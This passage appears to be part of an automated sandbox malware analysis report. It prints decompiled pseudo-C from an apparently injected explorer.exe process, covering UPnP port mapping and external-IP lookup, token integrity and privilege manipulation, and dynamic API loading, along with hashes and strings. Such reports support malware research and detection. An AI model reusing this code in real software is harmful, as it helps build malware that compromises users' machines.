					if(_v24 == 0) {
						while(0 != 0) {
						}
						L29:
						E01513990( &_v20, _v16);
						return _v8;
					}
					_t55 = E0151C990(_v24, _v12, 0);
					_t100 = _t98 + 0xc;
					_v28 = _t55;
					while(0 != 0) {
					}
					if(_v12 >= 0x3e8) {
						L13:
						E01513AC0( &_v308,  &_v308, "readrr956964", 0xc);
						_v296 = 0x2e;
						_v295 = 0x71;
						_v294 = 0;
						E01520D40( &_v308, 0xe,  &_v336);
						E015202A0( &_v336, 0x14,  &_v292);
						E01520390(_v24, _v12,  &_v292);
						_t81 = _v24;
						_t63 = E0151C990(_v24, _v12, 0);
						_t105 = _t100 + 0x3c;
						_v28 = _t63;
						while(0 != 0) {
						}
						while(0 != 0) {
						}
						if(_v12 >= 0x3e8) {
							L21:
							_t65 = E01518DB0(_t81, _a4, 2);
							_t106 = _t105 + 8;
							_v312 = _t65;
							if(_v312 == 0) {
								while(0 != 0) {
								}
								_v8 = 0xfffffffc;
								L26:
								E01513990( &_v24, _v12);
								_t98 = _t106 + 8;
								goto L29;
							}
							E01518E50(_v312, _v24, _v12);
							_t106 = _t106 + 0xc;
							CloseHandle(_v312);
							_v8 = 1;
							goto L26;
						} else {
							goto L19;
						}
						while(1) {
							L19:
							_t81 = 0;
							if(0 == 0) {
								goto L21;
							}
						}
						goto L21;
					}
					while(0 != 0) {
					}
					goto L13;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x01519ba9
0x01519bb0
0x01519bb7
0x01519bbe
0x01519bc5
0x01519bd0
0x01519bd5
0x01519bd8
0x01519bdf
0x01519bee
0x01519bf2
0x01519c00
0x01519c05
0x01519c08
0x01519c0f
0x01519d4a
0x01519d4e
0x01519d50
0x01519d58
0x00000000
0x01519d60
0x01519c1f
0x01519c24
0x01519c27
0x01519c2a
0x01519c2e
0x01519c37
0x01519c3f
0x01519c4d
0x01519c55
0x01519c5c
0x01519c63
0x01519c7a
0x01519c92
0x01519ca9
0x01519cb7
0x01519cbb
0x01519cc0
0x01519cc3
0x01519cc6
0x01519cca
0x01519ccc
0x01519cd0
0x01519cd9
0x01519ce1
0x01519ce7
0x01519cec
0x01519cef
0x01519cfc
0x01519d2b
0x01519d2f
0x01519d31
0x01519d38
0x01519d40
0x01519d45
0x00000000
0x01519d45
0x01519d0d
0x01519d12
0x01519d1c
0x01519d22
0x00000000
0x00000000
0x00000000
0x00000000
0x01519cdb
0x01519cdb
0x01519cdb
0x01519cdd
0x00000000
0x00000000
0x01519cdf
0x00000000
0x01519cdb
0x01519c39
0x01519c3d
0x00000000
0x01519c39
0x01519be1
0x01519be5
0x00000000

APIs

Part of subcall function 015199A0: SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 015199DF
Part of subcall function 015199A0: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 01519A76

CloseHandle.KERNEL32(00000000), ref: 01519D1C

Part of subcall function 01513990: lstrlenA.KERNEL32(01515216,?,0151546E,01516857,000000FF), ref: 015139A7
Part of subcall function 01513990: HeapFree.KERNEL32(018E0000,00000000,00000000), ref: 015139EA

Part of subcall function 01513990: lstrlenW.KERNEL32(?,?,0151546E,01516857,000000FF), ref: 015139BE

Strings

., xrefs: 01519C55
q, xrefs: 01519C5C
readrr956964, xrefs: 01519C41

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: FolderPathlstrlen$CloseFreeHandleHeap
String ID: .$q$readrr956964
API String ID: 2813995609-2183421447
Opcode ID: f5535c5e8c3946d85947c89a9aec2b8e47062e55547ffb6f9b9feec31bb3b248
Instruction ID: 1b852b09d88488e5e18d50f2c9e1c6d24a3b5dc7c1a8128f943b26075b27f08d
Opcode Fuzzy Hash: f5535c5e8c3946d85947c89a9aec2b8e47062e55547ffb6f9b9feec31bb3b248
Instruction Fuzzy Hash: 2A51E5B5C0410AABFF12DBA4DC61BEE7BF8BB54308F044899D105AF288E7755744CB92

Uniqueness

Uniqueness Score: 100.00%

Function 004001E0, Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E004001E0(intOrPtr _a4, WCHAR* _a8, long _a12) {
				WCHAR* _v8;
				char _v12;
				void* _v16;
				intOrPtr* _v20;
				short* _v24;
				void** _t29;

				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t29 =  &_v16;
				_push(_t29);
				_t46 = _a4;
				_push(_a4);
				L0040042E();
				if(_t29 != 0) {
					_v12 = E003F7F40(_t46, 0x1941);
					_push(0);
					_push(_v16);
					_push(0x4087f0);
					_v24 = E003F4CB0(_v12);
					E003F8170( &_v12);
					_v12 = E003F7F40(_v12, 0x201a);
					_v8 = E003FE0A0(0x80000002, _v24, _v12, 0);
					E003F8170( &_v12);
					if(_v8 != 0) {
						PathUnquoteSpacesW(_v8);
						if(ExpandEnvironmentStringsW(_v8, _a8, _a12) != 0) {
							while(0 != 0) {
							}
							_v20 = 1;
							L15:
							if(_v16 != 0) {
								LocalFree(_v16);
							}
							if(_v8 != 0) {
								E003F3F10( &_v8, 0xfffffffe);
							}
							return _v20;
						}
						while(0 != 0) {
						}
						goto L15;
					}
					while(0 != 0) {
					}
					goto L15;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x004001e6
0x004001ed
0x004001f4
0x004001fb
0x00400202
0x00400209
0x0040020c
0x0040020d
0x00400210
0x00400211
0x00400218
0x00400234
0x00400237
0x0040023c
0x0040023d
0x0040024e
0x00400255
0x0040026a
0x00400284
0x0040028b
0x00400297
0x004002a5
0x004002bf
0x004002c9
0x004002cd
0x004002cf
0x004002d6
0x004002da
0x004002e0
0x004002e0
0x004002ea
0x004002f2
0x004002f7
0x00000000
0x004002fa
0x004002c1
0x004002c5
0x00000000
0x004002c7
0x00400299
0x0040029d
0x00000000
0x0040029f
0x0040021a
0x0040021e
0x00000000

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00400211
PathUnquoteSpacesW.SHLWAPI(?), ref: 004002A5
ExpandEnvironmentStringsW.KERNEL32(?,?,?), ref: 004002B7
LocalFree.KERNEL32(?), ref: 004002E0

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: ConvertEnvironmentExpandFreeLocalPathSpacesStringStringsUnquote
String ID:
API String ID: 1452230276-0
Opcode ID: 87b2d8d2bebcd6dfe146170a080da8841800f18ac02e9c28529117e2a3183c92
Instruction ID: 377f4cf43a50c366ba92250626cf5f589204967731b90162ea2927909583f78a
Opcode Fuzzy Hash: 87b2d8d2bebcd6dfe146170a080da8841800f18ac02e9c28529117e2a3183c92
Instruction Fuzzy Hash: 95319CB9D04208EBDB00DFA0D849BBF7774AB44304F1085BEE501BA2C1EA799E00DB96

Uniqueness

Uniqueness Score: 0.72%

Function 003F76E0, Relevance: 6.1, APIs: 4, Instructions: 93
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E003F76E0(void* _a4) {
				char _v8;
				char _v9;
				void* _v16;
				void** _v20;
				intOrPtr* _v24;
				char* _v28;

				_v9 = 0;
				_v20 = 0;
				if(OpenProcessToken(_a4, 8,  &_v16) != 0) {
					_v20 = E003F72A0(_v16, 0x19,  &_v8);
					if(_v20 != 0) {
						_v28 = GetSidSubAuthorityCount( *_v20);
						if(_v28 == 0 || ( *_v28 & 0x000000ff) == 0) {
							while(0 != 0) {
							}
						} else {
							_v24 = GetSidSubAuthority( *_v20, ( *_v28 & 0x000000ff) - 1);
							if(_v24 != 0) {
								if( *_v24 >= 0x2000) {
									if( *_v24 < 0x2000 ||  *_v24 >= 0x3000) {
										if( *_v24 >= 0x3000) {
											_v9 = 3;
										}
									} else {
										_v9 = 2;
									}
								} else {
									_v9 = 1;
								}
								L24:
								if(_v20 != 0) {
									E003F3F10( &_v20, 0);
								}
								CloseHandle(_v16);
								return _v9;
							}
							while(0 != 0) {
							}
						}
						goto L24;
					}
					while(0 != 0) {
					}
					goto L24;
				}
				L1:
				if(0 == 0) {
					return 0;
				} else {
				}
				goto L1;
			}

0x003f76e6
0x003f76ea
0x003f7703
0x003f7724
0x003f772b
0x003f7744
0x003f774b
0x003f7757
0x003f775b
0x003f775f
0x003f7775
0x003f777c
0x003f778f
0x003f77a0
0x003f77bc
0x003f77be
0x003f77be
0x003f77ad
0x003f77ad
0x003f77ad
0x003f7791
0x003f7791
0x003f7791
0x003f77c2
0x003f77c6
0x003f77ce
0x003f77d3
0x003f77da
0x00000000
0x003f77e0
0x003f777e
0x003f7782
0x003f7784
0x00000000
0x003f774b
0x003f772d
0x003f7731
0x00000000
0x003f7733
0x003f7705
0x003f7707
0x00000000
0x00000000
0x003f7709
0x00000000

APIs

OpenProcessToken.ADVAPI32(003FA4C9,00000008,?), ref: 003F76FB
GetSidSubAuthorityCount.ADVAPI32 ref: 003F773E
GetSidSubAuthority.ADVAPI32(00000000,-00000001), ref: 003F776F
CloseHandle.KERNEL32(?), ref: 003F77DA

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Authority$CloseCountHandleOpenProcessToken
String ID:
API String ID: 1786183074-0
Opcode ID: 0e17aa92fe474f05ffd81b64508095264155a395cfece54fd0d99846dcc26b74
Instruction ID: db94ea4bfaa3239b0b19d17bb81a92cb6c023a7d3c1a68f7cd2c1fdcde9aedad
Opcode Fuzzy Hash: 0e17aa92fe474f05ffd81b64508095264155a395cfece54fd0d99846dcc26b74
Instruction Fuzzy Hash: 88319834D2C20DDFDB06EFA0C845BBF77BABB45301F104469D60167680D7754A48CBA1

Uniqueness

Uniqueness Score: 0.42%

Function 003F7340, Relevance: 6.1, APIs: 4, Instructions: 89
UNIQUE

Download Yara Rule

C-Code - Quality: 64%

			E003F7340(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _v8;
				void* _v12;
				CHAR* _v16;
				CHAR* _v20;
				intOrPtr _v24;
				long _v28;
				char _v32;
				struct _LUID _v40;
				CHAR* _v44;
				intOrPtr _v48;
				long _v52;
				char _v56;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0x10;
				_v12 = E003F7230(__ecx, 0x28);
				if(_v12 == 0) {
					return 0xfffffff8;
				}
				if(LookupPrivilegeValueA(0, _a4,  &_v40) != 0) {
					_v56 = 1;
					_v52 = _v40.LowPart;
					_v48 = _v40.HighPart;
					if(_a8 == 0) {
						_v44 = 0;
					} else {
						_v44 = 2;
					}
					_v56 = 1;
					_v52 = _v40.LowPart;
					_v48 = _v40.HighPart;
					_v44 = 0;
					 *0x4119bc(_v12, 0,  &_v56, 0x10,  &_v32,  &_v8);
					if(GetLastError() == 0) {
						_v32 = 1;
						_v28 = _v40.LowPart;
						_v24 = _v40.HighPart;
						if(_a8 == 0) {
							_v20 = 0;
						} else {
							_v20 = 2;
						}
						 *0x4119bc(_v12, 0,  &_v32, _v8, 0, 0);
						if(GetLastError() != 0) {
							_v16 = 0xfffffff9;
						}
					} else {
						_v16 = 0xfffffffa;
					}
				} else {
					_v16 = 0xfffffffb;
				}
				if(_v12 != 0) {
					CloseHandle(_v12);
				}
				return _v16;
			}

0x003f7346
0x003f734d
0x003f7354
0x003f7365
0x003f736c
0x00000000
0x003f736e
0x003f738a
0x003f7398
0x003f73a2
0x003f73a8
0x003f73af
0x003f73ba
0x003f73b1
0x003f73b1
0x003f73b1
0x003f73c1
0x003f73cb
0x003f73d1
0x003f73d4
0x003f73ef
0x003f73fd
0x003f7408
0x003f7412
0x003f7418
0x003f741f
0x003f742a
0x003f7421
0x003f7421
0x003f7421
0x003f7443
0x003f7451
0x003f7453
0x003f7453
0x003f73ff
0x003f73ff
0x003f73ff
0x003f738c
0x003f738c
0x003f738c
0x003f745e
0x003f7464
0x003f7464
0x00000000

APIs

Part of subcall function 003F7230: GetCurrentThread.KERNEL32(003F7583,00000000,00000008,?,?,003F7583,00000008), ref: 003F723E
Part of subcall function 003F7230: OpenThreadToken.ADVAPI32(00000000,?,?,003F7583,00000008), ref: 003F7245
Part of subcall function 003F7230: GetLastError.KERNEL32(?,?,003F7583,00000008), ref: 003F724F
Part of subcall function 003F7230: GetCurrentProcess.KERNEL32(003F7583,00000008,?,?,003F7583,00000008), ref: 003F7264
Part of subcall function 003F7230: OpenProcessToken.ADVAPI32(00000000,?,?,003F7583,00000008), ref: 003F726B

LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 003F7382
CloseHandle.KERNEL32(00000000), ref: 003F7464

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentOpenProcessThreadToken$CloseErrorHandleLastLookupPrivilegeValue
String ID:
API String ID: 3905888659-0
Opcode ID: 111f5b4699f379beecff4ead213e386915ef7a81a3c4636ddf0ed5ca11df4dea
Instruction ID: 374f1f84a1663258b0fc7796778a6329f9153c42e0d5a6ca00d2e04bfc55951e
Opcode Fuzzy Hash: 111f5b4699f379beecff4ead213e386915ef7a81a3c4636ddf0ed5ca11df4dea
Instruction Fuzzy Hash: 204107B4D0420CEBDB00CF95D858BEEBBB4FB08304F208259EA217B290D7B55A45CFA4

Uniqueness

Uniqueness Score: 100.00%

Function 0150E790, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0150E790(intOrPtr* _a4) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				int _v16;
				intOrPtr* _t44;
				intOrPtr _t46;

				_t44 = _a4;
				_v12 = _t44;
				if( *((intOrPtr*)(_v12 + 0x4c)) != 0) {
					if(strcmp(_v12 + 4, "NewPortListing") == 0) {
						L11:
						_t46 = _v12;
						 *((intOrPtr*)(_t46 + 0x50)) = 0;
						 *((intOrPtr*)(_v12 + 0x54)) = 0;
						 *((intOrPtr*)(_v12 + 0x4c)) = 0;
						return _t46;
					}
					_v16 =  *((intOrPtr*)(_v12 + 0x54));
					_v8 = E01513960( *((intOrPtr*)(_v12 + 0x54)), 0xc8);
					if(_v16 >= 0x80) {
						_v16 = 0x7f;
					}
					strncpy(_v8 + 8, _v12 + 4, 0x40);
					 *((char*)(_v8 + 0x47)) = 0;
					if( *(_v12 + 0x50) == 0) {
						 *(_v8 + 0x48) = 0;
					} else {
						memcpy(_v8 + 0x48,  *(_v12 + 0x50), _v16);
						 *((char*)(_v8 + _v16 + 0x48)) = 0;
					}
					do {
						 *_v8 =  *_v12;
						if( *_v8 != 0) {
							 *((intOrPtr*)( *_v12 + 4)) = _v8;
						}
						 *_v12 = _v8;
						 *((intOrPtr*)(_v8 + 4)) = _v12;
					} while (0 != 0);
					goto L11;
				}
				return _t44;
			}

0x0150e796
0x0150e799
0x0150e7a3
0x0150e7c0
0x0150e876
0x0150e876
0x0150e879
0x0150e883
0x0150e88d
0x00000000
0x0150e88d
0x0150e7cc
0x0150e7dc
0x0150e7e6
0x0150e7e8
0x0150e7e8
0x0150e7ff
0x0150e80a
0x0150e815
0x0150e840
0x0150e817
0x0150e829
0x0150e837
0x0150e837
0x0150e844
0x0150e84c
0x0150e854
0x0150e85e
0x0150e85e
0x0150e867
0x0150e86f
0x0150e872
0x00000000
0x0150e844
0x00000000

APIs

strcmp.MSVCRT(?,NewPortListing), ref: 0150E7B6
strncpy.MSVCRT(?,?,00000040), ref: 0150E7FF
memcpy.MSVCRT(?,00000000,00000080), ref: 0150E829

Strings

NewPortListing, xrefs: 0150E7AA

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memcpystrcmpstrncpy
String ID: NewPortListing
API String ID: 1377192721-794526294
Opcode ID: bf8fd3f411323bef857c4be738aa2eb621bcad262a621e80bd2d60ae889bd303
Instruction ID: 645baec8646a095170f1d2a654ecd82c981b5b5533d72a7ab44a0d8d0ad01b99
Opcode Fuzzy Hash: bf8fd3f411323bef857c4be738aa2eb621bcad262a621e80bd2d60ae889bd303
Instruction Fuzzy Hash: 653107B4E00209EFDB05CF98C585B9DBBB1FF84308F248098D9046B381D775AE45CB81

Uniqueness

Uniqueness Score: 7.75%

Function 0150C320, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0150C320(intOrPtr _a4, intOrPtr _a8, char* _a12) {
				char* _v8;
				char _v12;
				char _v100;
				intOrPtr _v104;
				char _v108;
				char _t33;
				char* _t38;
				char* _t40;
				intOrPtr _t43;
				void* _t55;
				void* _t56;
				void* _t59;
				void* _t60;

				_v104 = 0xffffffff;
				if(_a12 == 0 || _a4 == 0 || _a8 == 0) {
					return 0xfffffffe;
				} else {
					_t33 = E0150AEF0(_a8, 0xffffffff, _a4, _a8, "GetExternalIPAddress", 0,  &_v12);
					_t56 = _t55 + 0x18;
					_v108 = _t33;
					__eflags = _v108;
					if(_v108 != 0) {
						E0150E6C0(_v108, _v12,  &_v100);
						E01513990( &_v108, 0);
						_t49 =  &_v100;
						_t38 = E0150E9B0( &_v100, "NewExternalIPAddress");
						_t59 = _t56 + 0x1c;
						_v8 = _t38;
						__eflags = _v8;
						if(_v8 == 0) {
							 *_a12 = 0;
						} else {
							strncpy(_a12, _v8, 0x10);
							_t59 = _t59 + 0xc;
							_t49 = _a12;
							_a12[0xf] = 0;
							_v104 = 0;
						}
						_t40 = E0150E9B0( &_v100, "errorCode");
						_t60 = _t59 + 8;
						_v8 = _t40;
						__eflags = _v8;
						if(__eflags != 0) {
							_v104 = 0xffffffff;
							_t49 = _v8;
							_t43 = E01513E60(__eflags, _v8);
							_t60 = _t60 + 4;
							_v104 = _t43;
						}
						E0150E930(_t49,  &_v100);
						return _v104;
					}
					return 0xfffffffd;
				}
			}

0x0150c326
0x0150c331
0x00000000
0x0150c349
0x0150c35e
0x0150c363
0x0150c366
0x0150c369
0x0150c36d
0x0150c385
0x0150c393
0x0150c3a0
0x0150c3a4
0x0150c3a9
0x0150c3ac
0x0150c3af
0x0150c3b3
0x0150c3da
0x0150c3b5
0x0150c3bf
0x0150c3c4
0x0150c3c7
0x0150c3ca
0x0150c3ce
0x0150c3ce
0x0150c3e6
0x0150c3eb
0x0150c3ee
0x0150c3f1
0x0150c3f5
0x0150c3f7
0x0150c3fe
0x0150c402
0x0150c407
0x0150c40a
0x0150c40a
0x0150c411
0x00000000
0x0150c419
0x00000000
0x0150c36f

APIs

strncpy.MSVCRT(00000000,00000000,00000010), ref: 0150C3BF

Strings

errorCode, xrefs: 0150C3DD
GetExternalIPAddress, xrefs: 0150C34F
NewExternalIPAddress, xrefs: 0150C39B

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: strncpy
String ID: GetExternalIPAddress$NewExternalIPAddress$errorCode
API String ID: 3301158039-3204212013
Opcode ID: c9c047f7d3bd2594cc5e6c6c546b351f3406686b445cf1a5f1eadbd801050f74
Instruction ID: b5376c7abc34885ecb7b1e0939554bba9ada0bc286a2827f0524b46b2877290c
Opcode Fuzzy Hash: c9c047f7d3bd2594cc5e6c6c546b351f3406686b445cf1a5f1eadbd801050f74
Instruction Fuzzy Hash: 9A316AB1C00309EBDB11DEE8DC45BEE77B8BB55314F244A58E5186F2C1E7709A44CB91

Uniqueness

Uniqueness Score: 10.55%

Function 01505B03, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81
stringUNIQUE

Download Yara Rule

C-Code - Quality: 89%

			E01505B03(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				signed int _v12;
				char _v16;
				char _v80;
				char _t24;
				void* _t25;
				void* _t43;
				signed int _t51;
				signed int _t52;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t43 = __ecx;
				_v12 = _v12 & 0x00000000;
				_v12 = E0150574B(__eflags);
				_t24 = E01517B80(_t43, _t23, 2, "jkfkdm", 2);
				_t56 = _t55 + 0x10;
				_v8 = _t24;
				if(_t24 != 0) {
					_t25 = _a8;
					__eflags = _t25;
					if(_t25 == 0) {
						L9:
						_t52 = 0;
						_push(0);
						E015180D0( &_v8);
						L2:
						E01513990( &_v12, 0xfffffffe);
						return _t52;
					}
					_t54 = _a4 + 8;
					__eflags = _t54;
					_v16 = _t25;
					do {
						__eflags =  *((intOrPtr*)(_t54 + 0xc));
						if( *((intOrPtr*)(_t54 + 0xc)) == 0) {
							_push( *_t54);
							_push( *((intOrPtr*)(_t54 - 4)));
							E01513C30( &_v80, 0x40, "%u;%u;%u;",  *((intOrPtr*)(_t54 - 8)));
							E01517F90(_v8,  &_v80, lstrlenA( &_v80));
							E01517F90(_v8,  *((intOrPtr*)(_t54 + 4)),  *((intOrPtr*)(_t54 + 8)));
							E01517F90(_v8, 0x152a37c, lstrlenA(0x152a37c));
							_t56 = _t56 + 0x3c;
						}
						_t54 = _t54 + 0x18;
						_t20 =  &_v16;
						 *_t20 = _v16 - 1;
						__eflags =  *_t20;
					} while ( *_t20 != 0);
					goto L9;
				}
				_t52 = _t51 | 0xffffffff;
				goto L2;
			}

0x01505b03
0x01505b09
0x01505b1d
0x01505b20
0x01505b25
0x01505b28
0x01505b2d
0x01505b44
0x01505b47
0x01505b49
0x01505bc0
0x01505bc0
0x01505bc5
0x01505bc7
0x01505b32
0x01505b38
0x01505b43
0x01505b43
0x01505b56
0x01505b56
0x01505b59
0x01505b61
0x01505b61
0x01505b65
0x01505b67
0x01505b6c
0x01505b7a
0x01505b90
0x01505b9e
0x01505bae
0x01505bb3
0x01505bb3
0x01505bb6
0x01505bb9
0x01505bb9
0x01505bb9
0x01505bb9
0x00000000
0x01505bbf
0x01505b2f
0x00000000

APIs

Part of subcall function 0150574B: lstrlenA.KERNEL32(jkfkdm,00000000,?,jkfkdm), ref: 01505764

lstrlenA.KERNEL32(?,?,?,?,?,00000000,00000001,?,?,?,00000000), ref: 01505B86
lstrlenA.KERNEL32(0152A37C,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 01505BA7

Strings

jkfkdm, xrefs: 01505B15
%u;%u;%u;, xrefs: 01505B72

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %u;%u;%u;$jkfkdm
API String ID: 1659193697-2531163528
Opcode ID: 267333821725051470d17f7082d1cd850be091e6f9a78aeae479829034de47a8
Instruction ID: 4fcdc3bb1d39134ac83326906f6a3266fe0234f857f8583a20862886d319cc7d
Opcode Fuzzy Hash: 267333821725051470d17f7082d1cd850be091e6f9a78aeae479829034de47a8
Instruction Fuzzy Hash: 5321B672C0020ABBDF22ABE9CC05E8EBBBCFF54210F104455E914AA181F671AA109F94

Uniqueness

Uniqueness Score: 100.00%

Function 01501FB3, Relevance: 6.1, APIs: 4, Instructions: 81
UNIQUE

Download Yara Rule

C-Code - Quality: 81%

			E01501FB3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				intOrPtr _t37;
				signed int _t38;
				intOrPtr _t46;
				void* _t52;
				void* _t53;
				void* _t54;

				_t52 = 0;
				_t53 = 0;
				while(1) {
					_t27 =  *0x1537904; // 0x1909e28
					if(_t52 >=  *((intOrPtr*)(_t27 + 0x266e))) {
						break;
					}
					_t29 =  *((intOrPtr*)(_t27 + 0x266a));
					if( *((intOrPtr*)(_t29 + _t53 + 6)) == 0) {
						L10:
						_t53 = _t53 + 0x102b;
						if(_t53 < 0x101ad5) {
							continue;
						}
						break;
					}
					_t30 =  *((intOrPtr*)(_t29 + _t53 + 0xa));
					_t52 = _t52 + 1;
					if(_t30 < 0) {
						goto L10;
					}
					_push(_a12);
					_push(_t30);
					L015216A4();
					_t59 = _t30;
					_t31 =  *0x1537904; // 0x1909e28
					if(_t30 == 0) {
						_push(_a8);
						_t32 =  *(_t31 + 0x266a);
						_push( *((intOrPtr*)(_t32 + _t53 + 0xa)));
						L015216A4();
						__eflags = _t32;
						if(_t32 != 0) {
							_t46 =  *0x1537904; // 0x1909e28
							_t41 =  *((intOrPtr*)(_t46 + 0x266a)) + _t53;
							__eflags =  *((char*)( *((intOrPtr*)(_t46 + 0x266a)) + _t53 + 0x20)) - 1;
							if(__eflags == 0) {
								E015026EC(__eflags, _t46, _t41);
							}
						}
						_t33 =  *0x1537904; // 0x1909e28
						_push(0);
						_push(0);
						_push(_a8);
						_push( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x266a)) + _t53 + 0xa)));
						L015216A4();
						_t35 =  *0x1537904; // 0x1909e28
						L015216A4();
						_t37 =  *0x1537904; // 0x1909e28
						_t38 = E0150140B(_t37, _t37,  *((intOrPtr*)(_t37 + 0x266a)) + _t53,  *((intOrPtr*)(_t35 + 0x266a)),  *((intOrPtr*)( *((intOrPtr*)(_t35 + 0x266a)) + _t53 + 0xa)), _a4,  *((intOrPtr*)(_t33 + 0x266a)));
						_t54 = _t54 + 0x18;
						__eflags = _t38;
						if(__eflags < 0) {
							return _t38 | 0xffffffff;
						} else {
							goto L10;
						}
					}
					 *((char*)(_t53 +  *(_t31 + 0x266a) + 0x20)) = 0;
					E01502752(_t59, _t31,  *(_t31 + 0x266a) + _t53, 5);
					_t54 = _t54 + 0xc;
					goto L10;
				}
				return 0;
			}

0x01501fb8
0x01501fba
0x01501fbc
0x01501fbc
0x01501fc7
0x00000000
0x00000000
0x01501fcd
0x01501fd8
0x015020a3
0x015020a3
0x015020af
0x00000000
0x00000000
0x00000000
0x015020af
0x01501fde
0x01501fe2
0x01501fe5
0x00000000
0x00000000
0x01501feb
0x01501fee
0x01501fef
0x01501ff4
0x01501ff6
0x01501ffb
0x01502021
0x01502024
0x0150202a
0x0150202e
0x01502033
0x01502035
0x01502037
0x01502043
0x01502045
0x01502049
0x0150204d
0x01502053
0x01502049
0x01502054
0x0150205f
0x01502061
0x01502063
0x01502066
0x0150206a
0x01502070
0x01502082
0x01502088
0x01502097
0x0150209c
0x0150209f
0x015020a1
0x00000000
0x00000000
0x00000000
0x00000000
0x015020a1
0x01502003
0x01502014
0x01502019
0x00000000
0x01502019
0x00000000

APIs

#151.WS2_32(?,?), ref: 01501FEF
#151.WS2_32(?,?,?,?), ref: 0150202E
#151.WS2_32(?,?,00000000,00000000,?,?,?,?), ref: 0150206A
#151.WS2_32(?,?,00000000,?,?,00000000,00000000,?,?,?,?), ref: 01502082

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: #151
String ID:
API String ID: 1166381799-0
Opcode ID: 1e79e9815f257b2df42de803bb007d3dcd2ad5c1e72ca7855b4018d506b07b66
Instruction ID: 0740a69a908a1f984b223860de84c05b86fd8b7402a9ff52a12277ee3b155b9a
Opcode Fuzzy Hash: 1e79e9815f257b2df42de803bb007d3dcd2ad5c1e72ca7855b4018d506b07b66
Instruction Fuzzy Hash: 28215372A00611AFD727DBD8DC4CFA63BA5BB55314F0A01A4F9189F2A2C772E800C754

Uniqueness

Uniqueness Score: 100.00%

Function 00400D80, Relevance: 6.1, APIs: 4, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00400D80(void* __ecx) {
				struct HINSTANCE__* _v8;
				char _v12;
				intOrPtr _v16;
				_Unknown_base(*)()* _v20;
				struct HINSTANCE__* _v24;
				intOrPtr _t21;
				CHAR* _t22;
				intOrPtr _t32;
				CHAR* _t38;
				intOrPtr _t39;
				intOrPtr _t41;
				void* _t42;
				void* _t43;

				_t36 = __ecx;
				_v24 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				_t21 = E003F3EE0(__ecx, 0x100);
				_t43 = _t42 + 4;
				 *0x40f71c = _t21;
				_t22 =  *0x411860; // 0x15a0d5a
				_v8 = LoadLibraryA(_t22);
				if(_v8 != 0) {
					_t38 =  *0x4117f4; // 0x15a0807
					_v20 = GetProcAddress(_v8, _t38);
					if(_v20 != 0) {
						_t39 =  *0x40f71c; // 0x0
						E003F4120(_t36, _t39, 0, 0x100);
						_t43 = _t43 + 0xc;
						_v12 = 0xff;
						_t37 =  *0x40f71c; // 0x0
						_v16 = _v20(0, _t37,  &_v12);
						if(_v16 == 0) {
							FreeLibrary(_v8);
							return 0;
						}
						while(0 != 0) {
						}
						_v24 = 0xfffffffd;
						L13:
						if(_v8 != 0) {
							_t37 = _v8;
							FreeLibrary(_v8);
						}
						_t41 =  *0x411734; // 0x15a05bc
						_t32 =  *0x40f71c; // 0x0
